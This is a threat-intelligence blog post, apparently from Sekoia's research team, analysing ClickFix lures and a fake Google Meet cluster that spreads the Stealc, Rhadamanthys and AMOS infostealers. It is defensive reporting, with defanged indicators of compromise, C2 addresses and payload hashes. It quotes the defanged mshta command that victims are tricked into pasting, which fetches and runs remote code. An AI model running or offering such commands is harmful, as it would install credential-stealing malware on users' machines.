This blog post provides a chronological overview of the observed ClickFix campaigns. We further share technical details about a ClickFix cluster that uses fake Google Meet video conference pages to distribute infostealers.
Context
In May 2024, a new social engineering tactic called ClickFix emerged, featuring a ClearFake cluster that the Sekoia Threat Detection & Research (TDR) team closely monitored and analysed in a private report entitled FLINT 2024-027 – New widespread ClearFake variant abuses PowerShell and clipboard. This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems.
Proofpoint researchers, who named this tactic ClickFix, reported1 that the initial access broker TA571 leveraged it in email phishing campaigns since March 2024. These campaigns primarily used HTML files disguised as Word documents, displaying a fake error window that prompts users to install malware such as Matanbuchus, DarkGate, or NetSupport RAT via a PowerShell script.
In recent months, multiple malware distribution campaigns have leveraged the ClickFix lure to spread Windows and macOS infostealers, botnets, and remote access tools. This is in line with the growing, ongoing trend of distributing malware through the drive-by download technique. Sekoia analysts assess that several intrusion sets recently adopted this tactic, presumably to evade antivirus software scanning and browser security features, aiming to improve attackers’ infection rates.
In this blog post, we provide a chronological overview of the observed ClickFix campaigns. We further share technical details about a ClickFix cluster that uses fake Google Meet video conference pages to distribute infostealers, targeting both Windows and macOS systems. Sekoia analysts successfully associated this cluster impersonating Google Meet with two cybercrime groups: “Slavic Nation Empire (SNE)” and “Scamquerteo“. These groups are sub-teams of the cryptocurrency scam teams “Marko Polo” and “CryptoLove“, respectively.
ClickFix in the wild
Chronological overview of ClickFix campaigns
Since June 2024, various open source reports and Sekoia investigations have revealed malware distribution campaigns using the emerging ClickFix tactic. The following figure provides a chronological overview of these campaigns. It highlights the malware families involved and the distribution techniques used, which include phishing emails, compromised websites, and distribution infrastructures.
Here are some examples of malicious websites that impersonate Google Chrome, Facebook, PDFSimpli, and reCAPTCHA, using the ClickFix social engineering tactic.
Victimology of ClickFix clusters
While many of these campaigns reportedly aim to broadly target multiple sectors – using websites compromised by ClearFake or through extensive phishing efforts – some are designed to target specific verticals.
For instance, Proofpoint identified2 a ClickFix cluster targeting transport and logistics companies in North America from at least May to August 2024. This campaign uses websites that impersonate transport and fleet operations management software.
Additionally, the GitHub issues campaign mainly targeted developers to spread Lumma Stealer by falsely reporting security vulnerabilities, thereby impacting thousands of public code repositories and exploiting developers’ trust in GitHub notifications. The goal of this large-scale operation was likely to opportunistically gather a significant amount of sensitive developer data, which can be used for more targeted attacks in the future.
Recent campaigns uncovered by Sekoia analysts appear to continuously target both businesses and individuals, using opportunistic lures such as fake Google Meet pages and Facebook groups.
Investigation of ClickFix clusters
The following section provides a detailed analysis of one of the clusters discovered by Sekoia analysts.
Fake Google Meet pages and technical issues
By pivoting on the text elements in ClickFix messages displayed to users, such as the phrase “Press the key combination” or “CTRL+V”, we discovered several websites masquerading as the homepage of a Google Meet video conference. The sites displayed pop-up windows falsely indicating problems with the microphone and headset, as shown on the figure below.
We identified the following domain names and IP address that we attribute to this cluster with high confidence:
meet[.]google[.]us-join[.]com meet[.]googie[.]com-join[.]us meet[.]google[.]com-join[.]us meet[.]google[.]web-join[.]com meet[.]google[.]webjoining[.]com meet[.]google[.]cdm-join[.]us meet[.]google[.]us07host[.]com googiedrivers[.]com 77.221.157[.]170 |
The phishing URLs imitate legitimate ones with the same pattern for the meeting identifier, e.g.:
hxxps://meet[.]google[.]com-join[.]us/wmq-qcdn-orj hxxps://meet[.]google[.]us-join[.]com/ywk-batf-sfh hxxps://meet[.]google[.]us07host[.]com/coc-btru-ays hxxps://meet[.]google[.]webjoining[.]com/exw-jfaj-hpa |
Windows users targeted with Stealc and Rhadamanthys
For Windows users, clicking on the “Try Fix” button results in copying the following command into the clipboard:
mshta hxxps://googIedrivers[.]com/fix-error |
The fix-error file (SHA256: 92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138) is an HTML file containing an HTML Application (HTA) which itself contains an obfuscated VBScript. Using a Python script3, we deobfuscated it and obtained the following VBScript.
Upon execution, the VBS script performs the following actions:
- It terminates its parent process (mshta.exe).
- It downloads two executables (stealc.exe and ram.exe) using bitsadmin. After a two-seconds delay, it notifies the C2 server (webapizmland[.]com) about the success or failure of running the executables.
- It retrieves the victim’s public IP address using the service api.ipify[.]org and sends it to the C2 server along the execution status.
The two executables stealc.exe (SHA256: a834be6d2bec10f39019606451b507742b7e87ac8d19dc0643ae58df183f773c) and ram.exe (SHA256: 2853a61188b4446be57543858adcc704e8534326d4d84ac44a60743b1a44cbfe) are the Stealc and Rhadamanthys payloads respectively, both protected by the HijackLoader crypter.
In this campaign, the Stealc C2 server is “hxxp://95.182.97[.]58/84b7b6f977dd1c65.php” and the Rhadamanthys C2 server is “hxxp://91.103.140[.]200:9078/3936a074a2f65761a5eb8/6fmfpmi7.fwf4p”. Both IP addresses were already known by our CTI database following the Sekoia.io C2 Trackers monitoring routine, as we proactively track the C2 infrastructure of these two infostealer families sold as Malware-as-a-Service.
Notably, the name of the Stealc botnet “sneprivate24” suggests that the traffer4 group “Slavic Nation Empire (SNE)” was behind this campaign. Further details about this association can be found in the section “Traffers teams operating this ClickFix cluster”.
MacOS users targeted by AMOS Stealer
For macOS users, clicking on the “Try Fix” button results in downloading the file Launcher_v1.94.dmg (SHA256: 94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5), using the following HTTP requests:
- A GET request to hxxps://carolinejuskus[.]com/kusaka.php?call=launcher, where the server responds with a second URL in the HTTP header Location.
- A GET request to hxxps://carolinejuskus[.]com/f9dfbcf6a999/7cc2f5dc3c76/load.51f8527e20dcb05ffd8586b853937a8a.php?call=launcher, which returns the malicious payload.
We identified the payload Launcher_v1.94.dmg (SHA256: 94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5) as AMOS Stealer, which communicates with its C2 server at “hxxp://85.209.11[.]155/joinsystem”.
Sekoia actively tracks this infrastructure characterised by the /kusaka.php endpoint. Since at least May 2024, this endpoint is used in campaigns redirecting users from malicious websites to download the AMOS Stealer. It is likely used to protect the payload from unwanted traffic, such as downloads by bots or scans by security products.
We identified the following domain names associated with this macOS malware distribution infrastructure:
alienmanfc6[.]com apunanwu[.]com bowerchalke[.]com carolinejuskus[.]com cautrucanhtuan[.]com cphoops[.]com dekhke[.]com iloanshop[.]com kansaskollection[.]com lirelasuisse[.]com mdalies[.]com mensadvancega[.]com mishapagerealty[.]com modoodeul[.]com pabloarruda[.]com pakoyayinlari[.]com patrickcateman[.]com phperl[.]com stonance[.]com utv4fun[.]com |
Given the variety of initial malicious websites redirecting to this infrastructure, we assess with high confidence that it is shared among multiple threat actors. They collaborate within a centralised traffers team to share certain resources, including this infrastructure and the AMOS Stealer, which is also sold as Malware-as-a-Service.
Traffers teams operating this ClickFix cluster
Slavic Nation Empire (SNE): a sub-group of Marko Polo
The attacker’s server hosts an interesting JavaScript code at hxxp://77.221.157[.]170:3004/server.js5, which is a backend code related to this distribution infrastructure. In brief, this JavaScript connects to a MongoDB database to retrieve worker’s information, and sends statistics to two Telegram bots when users visited the malicious Google Meet websites and successfully downloaded the payload. We would like to thank the cybersecurity researcher Karol Paciorek from the CSIRT KNF team for sharing this discovery with us6.
The following is an excerpt of the JavaScript code that includes the message sent to the two Telegram bots.
The attacker uses this backend to track compromises and visits for this ClickFix cluster.
By extracting the chat logs of the Telegram bots “#SNE | GMEET OTSTUK” using the Telegram API, we discovered a discussion between sparkhash, the alleged developer of this ClickFix cluster, and the traffer Alexmen. Our investigation revealed that both threat actors are members of the traffers team “Slavic Nation Empire (SNE)“, which is a sub-team of the cryptocurrency scam team “Marko Polo“.
Cybercriminals frequently use Telegram bots to monitor their activities, especially when this involves working in a team and collaborating with affiliates (traffers/workers).
Based on our analysis of this cluster’s activities and the messages shared between the threat actors operating and using it, Sekoia analysts advance the following hypothesis:
- The threat actor sparkhash deployed the GMeet cluster for the benefit of the traffers team “Slavic Nation Empire (SNE)“ in charge of generating traffic to this cluster.
- This team of traffers could be administered by the threat actor Alexmen who oversees the distribution clusters activities and possibly manages infostealers licences, relying on external services.
- The traffers, also known as affiliates or workers, spread the malicious URLs to potential victims, redirecting them to this cluster. For example, the cybercriminal going by the handle web3huntereth may have infected a victim, or himself as part of a test, in Poland, as indicated by the download statistics from the Telegram bot.
TDR confidently associate this cluster impersonating Google Meet with the traffers team “Slavic Nation Empire (SNE)”, also known as “Slavice Nation Land”. This team provides its members a comprehensive kit for sophisticated scams targeting users of cryptocurrency assets, Web3 applications, decentralised finance, and NFT. The kit includes landing pages impersonating software and video conferencing webpages, along with infostealers, drainers, and automation tools to coordinate attacks.
The traffers team “Slavic Nation Empire (SNE)” is a sub-group of the cryptocurrency scam team “Marko Polo” and part of the Russian-speaking cybercrime ecosystem. We would like to thank the cybersecurity researcher g0njxa for sharing some valuable hints on these groups with us. Additionally, Recorded Future researchers have published two reports detailing Marko Polo campaigns78.
Scamquerteo Team: a sub-group of CryptoLove
Moreover, we discovered that the traffers team “Scamquerteo” also used this ClickFix cluster impersonating Google Meet, specifically using the FQDN “meet[.]google[.]webjoining[.]com” to spread malware. The traffers team “Scamquerteo Team” is a sub-group of the cryptocurrency scam team “CryptoLove” and part of the Russian-speaking cybercrime ecosystem.
During our investigation, we were able to interact with their Telegram bot, which manages operating the traffers activities for the fake Google Meet cluster, as shown by the following figure.
Both traffers teams, “Slavic Nation Empire (SNE)” and “Scamquerteo“, use the same ClickFix template that impersonates Google Meet. This discovery suggests that these teams share materials, also known as “landing project”, as well as infrastructure.
Sekoia analysts assess with medium confidence that both teams use the same cybercrime service to supply them with this fake Google Meet cluster, that remains unknown at the time of writing. Additionally, it is likely that a third party manages their infrastructure or registers their domain names.
Conclusion
ClickFix is an emerging social engineering tactic first observed in 2024. As of September 2024, several intrusion sets already adopted it to widely distribute malware through email phishing campaigns, compromised websites, and distribution infrastructures.
The ClickFix tactic deceives users into downloading and running malware on their machines without involving a web browser for download or requiring manual file execution. It makes it possible to bypass web browser security features, such as Google Safe Browsing, and to appear less suspicious to unsuspecting corporate and individual users.
The ClickFix cluster analysed in this blog post employs a decoy that could be particularly devastating in campaigns targeting organisations that use Google Workspace, especially Google Meet. The investigation into the traffers team distributing this cluster suggests that it primarily targets cryptocurrency assets, Web3 applications, decentralised finance, and NFT users. However, we believe that similar social engineering techniques could be employed in other malware distribution campaigns.
Cluster ClickFix IoCs & Technical details
The list of IoCs is available on Sekoia.io GitHub repository.
Fake Google Meet pages and associated infection chain
Phishing domains impersonating Google Meet:
meet[.]google[.]us-join[.]com
meet[.]googie[.]com-join[.]us
meet[.]google[.]com-join[.]us
meet[.]google[.]web-join[.]com
meet[.]google[.]webjoining[.]com
meet[.]google[.]cdm-join[.]us
meet[.]google[.]us07host[.]com
googiedrivers[.]com
77.221.157[.]170
Phishing URLs impersonating Google Meet pages:
hxxps://meet[.]google[.]com-join[.]us/wmq-qcdn-orj
hxxps://meet[.]google[.]us-join[.]com/ywk-batf-sfh
hxxps://meet[.]google[.]us07host[.]com/coc-btru-ays
hxxps://meet[.]google[.]webjoining[.]com/exw-jfaj-hpa
Infection chains:
googiedrivers[.]com (payload download)
us18web-zoom[.]us (payload download)
webapizmland[.]com (fingerprint data exfiltration)
carolinejuskus[.]com (macOS payload download)
95.182.97[.]58 (Stealc C2)
91.103.140[.]200 (Rhadamanthys C2)
85.209.11[.]155 (AMOS Steaker C2)
hxxps://googIedrivers[.]com/fix-error (payload download)
hxxps://us18web-zoom[.]us/stealc.exe (payload download)
hxxps://us18web-zoom[.]us/ram.exe (payload download)
hxxps://webapizmland[.]com/api/cmdruned (payload download)
hxxp://95.182.97[.]58/84b7b6f977dd1c65.php (Stealc C2)
hxxp://91.103.140[.]200:9078/3936a074a2f65761a5eb8/6fmfpmi7.fwf4p (Rhadamanthys C2)
hxxps://carolinejuskus[.]com/kusaka.php?call=launcher (macOS payload download)
hxxp://85.209.11[.]155/joinsystem (AMOS Stealer C2)
92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138 (malicious HTML payload)
a834be6d2bec10f39019606451b507742b7e87ac8d19dc0643ae58df183f773c (Stealc payload)
2853a61188b4446be57543858adcc704e8534326d4d84ac44a60743b1a44cbfe (Rhadamanthys payload)
94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5 (AMOS Stealer payload)
AMOS Stealer distribution infrastructure:
alienmanfc6[.]com
apunanwu[.]com
bowerchalke[.]com
carolinejuskus[.]com
cautrucanhtuan[.]com
cphoops[.]com
dekhke[.]com
iloanshop[.]com
kansaskollection[.]com
lirelasuisse[.]com
mdalies[.]com
mensadvancega[.]com
mishapagerealty[.]com
modoodeul[.]com
pabloarruda[.]com
pakoyayinlari[.]com
patrickcateman[.]com
phperl[.]com
stonance[.]com
utv4fun[.]com
Additional clusters allegedly associated to the same traffers teams
Sekoia.io TDR uncovered a large-scale malware distribution infrastructure allegedly associated with several traffers team which use the fake Google Meet cluster. This infrastructure was unveiled based on passive DNS, Whois lookups, and HTML similarities, such as title, text, favicon and resources.
This infrastructure includes webpages impersonating platforms like Zoom, video games, office software, and fake Web3 applications, which spread Stealc, Rhadamanthys, and AMOS Stealer to Web3 gamers.
- Zoom cluster
us01web-zoom[.]us us03web-zoom[.]us us07web-zoom[.]us us08web-zoom[.]us us09web-zoom[.]us us10web-zoom[.]us us18web-zoom[.]us us30web-zoom[.]us us40web-zoom[.]us us45web-zoom[.]us us50web-zoom[.]us us60web-zoom[.]us us70web-zoom[.]us us77web-zoom[.]us us80web-zoom[.]us us85web-zoom[.]us us95web-zoom[.]us | us004web-zoom[.]us us005web-zoom[.]us us006web-zoom[.]us us007web-zoom[.]us us008web-zoom[.]us us050web-zoom[.]us us055web-zoom[.]us us500web-zoom[.]us us505web-zoom[.]us us555web-zoom[.]us us002webzoom[.]us us003webzoom[.]us us4web-zoom[.]us us5web-zoom[.]us us6web-zoom[.]us | us01web[.]us us03web[.]us us08web[.]us us09web[.]us us15web[.]us us20web[.]us us40web[.]us us50web[.]us us55web[.]us web05-zoom[.]us webroom-zoom[.]us |
- PDF reader cluster (office software)
doculuma[.]com fatoreader[.]com fatoreader[.]net gamascript[.]com verdascript[.]com veriscroll[.]com |
- Lunacy / Calipso (fake video game)
calipsoproject[.]com lunacy3[.]com lunacy4[.]com projectcalipso[.]com thecalipsoproject[.]com web3dev[.]buzz |
- ULTIMATE / BATTLEFORGE (fake video game)
battleforge[.]cc battleultimate[.]xyz mybattleforge[.]xyz myultimate[.]xyz playbattleforge[.]org playbattleforge[.]xyz playultimate[.]xyz tooldream[.]live ultimategame[.]xyz ultimateplay[.]xyz |
- RAGON GAME (fake video game)
argongame[.]com darkblow[.]com missingfrontier[.]com nightpredators[.]com riotrevelry[.]com thewatch[.]com us12web[.]us web3dev[.]buzz webjoining[.]com |
- Web3 web browser
sleipnirbrowser[.]org sleipnirbrowser[.]xyz |
- Cozy World Metaverse
cozyland[.]xyz cozymeta[.]com cozymeta[.]fun cozymeta[.]xyz cozyweb3[.]com cozyworld[.]io worldcozy[.]com |
- NGT Studio
ngtmeta[.]io ngtmetaland[.]io ngtmetaweb[.]com ngtproject[.]com ngtstudio[.]io ngtstudio[.]online ngtverse[.]org night-support[.]xyz nightstudio[.]io nightstudioweb[.]xyz |
- Nortex Web3 Messaging App
lastnuggets[.]com mor-dex[.]world mordex[.]blog mordex[.]digital mordex[.]homes nor-tex[.]eu nor-tex[.]pro nor-tex[.]world nor-tex[.]xyz nort-ex[.]eu nort-ex[.]lol nort-ex[.]world nortex-app[.]pro nortex-app[.]us nortex-app[.]xyz nortex[.]app nortex[.]blog nortex[.]digital nortex[.]life nortex[.]limited nortex[.]lol nortex[.]uk nortexapp[.]com nortexapp[.]digital nortexapp[.]io nortexapp[.]me nortexapp[.]pro nortexapp[.]xyz nortexmessenger[.]blog nortexmessenger[.]digital nortexmessenger[.]pro nortexmessenger[.]us |
External references
- https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn ↩︎
- https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering ↩︎
- https://gist.github.com/qbourgue/e7959e4089c1993045e01cb9c3cbc6a5 ↩︎
- https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem/ ↩︎
- https://urlscan.io/result/d77b2603-e586-403b-ae49-90523269510a/ ↩︎
- https://x.com/karol_paciorek/status/1838878695269728455 ↩︎
- https://www.recordedfuture.com/research/the-travels-of-markopolo-self-proclaimed-meeting-software-vortax-spreads-infostealers ↩︎
- https://www.recordedfuture.com/research/marko-polo-navigates-uncharted-waters-with-infostealer-empire ↩︎
Feel free to read other Sekoia.io TDR (Threat Detection & Research) analysis here :